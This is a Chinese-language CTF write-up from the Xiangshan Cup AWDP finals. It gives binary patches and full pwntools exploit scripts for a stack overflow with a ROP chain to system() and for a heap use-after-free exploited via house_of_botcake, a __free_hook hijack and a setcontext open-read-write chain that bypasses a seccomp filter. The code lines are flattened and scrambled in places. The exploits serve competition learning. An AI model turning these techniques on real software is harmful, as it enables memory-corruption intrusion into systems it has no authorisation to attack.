香山杯决赛Awdp分享
ezgame
简单栈溢出,改gets,改偏移,加通防,都可以
from AwdPwnPatcher import *
= AwdPwnPatcher('./pwn')
elf = '''
assembly mov rsi,rdi
xor rdi,rdi
mov rdx,1612
syscall
'''
0x4017FF, jmp_to=0x401809, assembly=assembly)
elf.patch_by_jmp( elf.save()
how2stack
简单栈溢出
改read大小防御
from AwdPwnPatcher import *
= AwdPwnPatcher('./pwn')
elf
= '''
assembly mov eax,0x62
'''
0x01765,0x00000176B,assembly=assembly)
elf.patch_origin( elf.save()
漏洞点

攻击注意-1绕过,绕过后栈溢出。
from pwn import *
from pwn import p64,u64
= 1
debug = 0
gdb_is = "./pwn"
elf_path # context(arch='i386',os = 'linux')
='amd64',os = 'linux', log_level='DEBUG')
context(arch# context(arch='amd64',os = 'linux')
if debug:
= ['wt.exe','nt','Ubuntu','-c']
context.terminal if gdb_is:
# r = gdb.debug(elf_path,'set debug-file-directory ./.debug/')
# gdb.attach(r,'b* 0x4012ed')
= process(elf_path)
r
gdb.attach(r)# pause()
pass
else:
= process(elf_path)
r
else:
= "39.106.48.123:31571"
host = connect(host.split(':')[0],host.split(':')[1])#远程连接
r =0
gdb_is
def show_addr(name,addr):
f'{name} = {hex(addr)}')
success(
def revc_addr(name:str, until:bytes =b'\x7f',offset:int = 0,addrType:str = 'bytes')->int:
if type(until) == str:
= until.encode()
until if addrType == 'bytes':
if not offset:
= u64(r.recvuntil(until).ljust(8,b'\x00'))
addr else:
= u64(r.recvuntil(until)[:offset].ljust(8,b'\x00'))
addr elif addrType == 'str':
= int(r.recvuntil(until)[2:offset].decode(),16)
addr
show_addr(name,addr)return addr
= ELF(elf_path)
elf = ELF('./libc.so.6')
libc
str(0).encode())
r.sendline(
'Length: ',b'-1')
r.sendlineafter(b= b'A' * 99 + b'A' + b'\xff\xff\xff\xff'
payload 'Data: ',payload)
r.sendafter(b'Result in hex: ')
r.recvuntil(b= int(b''.join(r.recvuntil(b'7f').split(b' ')[-6:][::-1]),16) + 0x28
stack_rbp_addr 'stack_rbp_addr',stack_rbp_addr)
show_addr(
str(0).encode())
r.sendline('Length: ',b'-1')
r.sendlineafter(b= b'A' * 99 + b'A' + b'\xff\xff\xff\xff' + p64(stack_rbp_addr + 8)
payload 'Data: ',payload)
r.sendafter(b= int(b''.join(r.recvuntil(b'7f').split(b' ')[-6:][::-1]),16) - 0x24083
libc.address 'libc.address',libc.address)
show_addr(
= ROP(libc)
rop str(0).encode())
r.sendline('Length: ',b'-1')
r.sendlineafter(b'A' * 99 + b'A' + b'\xff\xff\xff\xff' + p64(stack_rbp_addr)+b'junkjunk')
rop.raw(b0])
rop.raw(rop.ret[= libc.address + 0x00001B45BD
rop.rdi
rop.system()
info(rop.dump())
'Data: ',rop.chain())
r.sendafter(b
r.interactive()
camera
改printf泄露防御,修改一下输出格式,修改%s溢出等等。正解应该是next指针置0。
//改for(i = 1;;i++)
当时做题做了半天没做出来,光逆向看就很麻烦,还是得手动加加结构体,一目了然。
IDA快捷键
代码页面
C -> 将此段代码理解为Code,反汇编
A -> 将此段代码理解为String
Y -> 修改类型
N -> 重命名
结构体页面
D -> 添加数据
U -> 删除数据(其实是改为undefine)
Insert -> 插入结构体
结构体构造如下

主要逻辑
堆题有Add,Load,Show
Add
Load
Show
修完后,漏洞点一目了然,在Load的时候,给对应index的next指针指向了上一个Load的chunk,而且其他地方也没有做修改,造成UAF,可以Double Free。每次Add到相同index的值,就可以一直Free。且题目也没有清空free chunk,将free chunk再申请回来show,就可以泄露heap和libc
for i in range(7):
0x100,b'Z') #0 - 6
add(
0x100,b'A') # 7
add(0x100,b'B') # 8
add(
0x100,b'C') # 9 # previous chunk
add(0x100,b'D') # 10 # victim chunk
add(0x100,b'E') # 11
add(
for i in range(6):
load(i)2)
show(
8)
load(7)
load(6)
load(4)
show(
0x200,b'\xf0') #0
add(
0)
load(2)
show(
= ELF('./libc.so.6')
libc 'The film content: ')
r.recvuntil(b= revc_addr('main_neara') - 0x1ecdf0
libc.address 'libc.addr',libc.address)
show_addr(
0x100,b'A') #0
add(0)
load(2)
show('The film content: ')
r.recvuntil(b= revc_addr('heap_chunk',b'Over',-5) - 0x741
heap_base 'heap_base',heap_base) show_addr(
然后考虑打house_of_botcake,劫持tcache。思路是先让unsortedbin合并两个0x100,再申请让tcache空出来,再DoubleFree,合并的0x200中的后一个0x100,再申请0x120,造成堆块重叠,完全控制Free的tcache。
0x80,b'temp') #0 0x558facc59f50
add(
10) # victim chunk 0x555dfcdfbc20
load(0)
load(3)
show(
# 0chunk.next -> 10chunk
# 10chunk.next -> 0
# chunkptr -> 0
9) # previous chunk
load(2)
show(# chunkptr -> 0
# ---------------
# previous chunk # 0x555da9201c20
# ---------------
# victim chunk # 0x555da9201d40
# ---------------
0x80,b'temp') #0
add(0x100,b'Z') #1
add(0)
load(3) # 再free(10) UAF show(
打__free_hook,system后发现badsyscall,seccomp-tools dump一下。
# # line CODE JT JF K=================================
# # 0000: 0x20 0x00 0x00 0x00000004 A = arch
# # 0001: 0x15 0x00 0x02 0xc000003e if (A != ARCH_X86_64) goto 0004
# # 0002: 0x20 0x00 0x00 0x00000000 A = sys_number
# # 0003: 0x15 0x00 0x01 0x0000003b if (A != execve) goto 0005
# # 0004: 0x06 0x00 0x00 0x00000000 return KILL
# # 0005: 0x06 0x00 0x00 0x7fff0000 return ALLOW # #
打setcontext -> orw吧。
最终完整exp如下
from pwn import *
from pwn import p64,u64
from LibcSearcher import *
= 1
debug = 0
gdb_is = "./pwn"
elf_path # context(arch='i386',os = 'linux')
='amd64',os = 'linux', log_level='DEBUG')
context(archif debug:
= ['wt.exe','nt','Ubuntu','-c']
context.terminal if gdb_is:
# r = gdb.debug(elf_path,'set debug-file-directory ./.debug/')
# gdb.attach(r,'b* 0x4012ed')
= process(elf_path)
r
gdb.attach(r)# pause()
pass
else:
= process(elf_path)
r
else:
= "192.168.0.111:53783"
host = connect(host.split(':')[0],host.split(':')[1])#远程连接
r =0
gdb_is
def show_addr(name,addr):
f'{name} = {hex(addr)}')
success(
def revc_addr(name:str, until:bytes =b'\x7f',offset:int = 0,addrType:str = 'bytes')->int:
if type(until) == str:
= until.encode()
until if addrType == 'bytes':
if not offset:
= u64(r.recvuntil(until).ljust(8,b'\x00'))
addr else:
= u64(r.recvuntil(until)[:offset].ljust(8,b'\x00'))
addr elif addrType == 'str':
= int(r.recvuntil(until)[2:offset].decode(),16)
addr
show_addr(name,addr)return addr
= ELF(elf_path)
elf
def menu(num):
'>> \n',str(num).encode())
r.sendlineafter(b
def add(size,context):
2)
menu(# 0xF <= Size <= 0x500
'budget.\n',str(size).encode())
r.sendlineafter(b'Content: \n',context)
r.sendlineafter(b
def load(index):
3)
menu('whitch one do you want to load\n',str(index).encode())
r.sendlineafter(b
def show(index):
1)
menu('Do you want to take a few pictures?\n',str(index).encode())
r.sendlineafter(b
for i in range(7):
0x100,b'Z') #0 - 6
add(
0x100,b'A') # 7
add(0x100,b'B') # 8
add(
0x100,b'C') # 9 # previous chunk
add(0x100,b'D') # 10 # victim chunk
add(0x100,b'E') # 11
add(
for i in range(6):
load(i)2)
show(
8)
load(7)
load(6)
load(4)
show(
0x200,b'\xf0') #0
add(
0)
load(2)
show(
= ELF('./libc.so.6')
libc 'The film content: ')
r.recvuntil(b= revc_addr('main_neara') - 0x1ecdf0
libc.address 'libc.addr',libc.address)
show_addr(
0x100,b'A') #0
add(0)
load(2)
show('The film content: ')
r.recvuntil(b= revc_addr('heap_chunk',b'Over',-5) - 0x741
heap_base 'heap_base',heap_base)
show_addr(
0x80,b'temp') #0 0x558facc59f50
add(
10) # victim chunk 0x555dfcdfbc20
load(0)
load(3)
show(
# 0chunk.next -> 10chunk
# 10chunk.next -> 0
# chunkptr -> 0
9) # previous chunk
load(2)
show(# chunkptr -> 0
# ---------------
# previous chunk # 0x555da9201c20
# ---------------
# victim chunk # 0x555da9201d40
# ---------------
0x80,b'temp') #0
add(0x100,b'Z') #1
add(0)
load(3) # 再free(10) UAF
show(
# # line CODE JT JF K
# # =================================
# # 0000: 0x20 0x00 0x00 0x00000004 A = arch
# # 0001: 0x15 0x00 0x02 0xc000003e if (A != ARCH_X86_64) goto 0004
# # 0002: 0x20 0x00 0x00 0x00000000 A = sys_number
# # 0003: 0x15 0x00 0x01 0x0000003b if (A != execve) goto 0005
# # 0004: 0x06 0x00 0x00 0x00000000 return KILL
# # 0005: 0x06 0x00 0x00 0x7fff0000 return ALLOW
# system GG
= libc.address + 0x0151990
magic_gadget 0x120,b'A'* 0x110 + p64(libc.sym['__free_hook'])) #0
add(
0x100,b'A') #1
add(0x100,p64(magic_gadget)) #2
add(
'heap_base',heap_base)
show_addr(b
= heap_base + 0xfe0
orw_addr = ROP(libc)
rop = orw_addr + 0x8
rop.base open(b'flag',0,0)
rop.3,orw_addr + 0x10 +0x200,0x30)
rop.read(1,orw_addr + 0x10 +0x200,0x30)
rop.write(0x500,rop.chain()[8:]) #3
add(= heap_base + 0x14f0 + 0x10
rdi_addr = p64(0) + p64(rdi_addr) + p64(0) * 2 + p64(libc.sym['setcontext']+61) + p64(0) #0x30
rdi_payload # 0x0000000000151990 : mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rsp], rax ; call qword ptr [rdx + 0x20]
+= p64(0) * int(0x70 / 8) + p64(orw_addr+0x10) + rop.chain()[:8]
rdi_payload
0x300,rdi_payload) #4
add(
5)
load(# pause()
2)
show(
r.interactive()
决赛感受总结
第一次线下赛,感觉和线上完全不一样,打的时候头很晕。学到了很多。本来应该一下子就看出来的题,没看出来。然后IDA的添加结构体真的很重要,帮助看逻辑。
然后准备写一个setcontext -> orw的通用板子,不然找偏移找好慢。
总的来说这次学到了好多,期待下一次的比赛。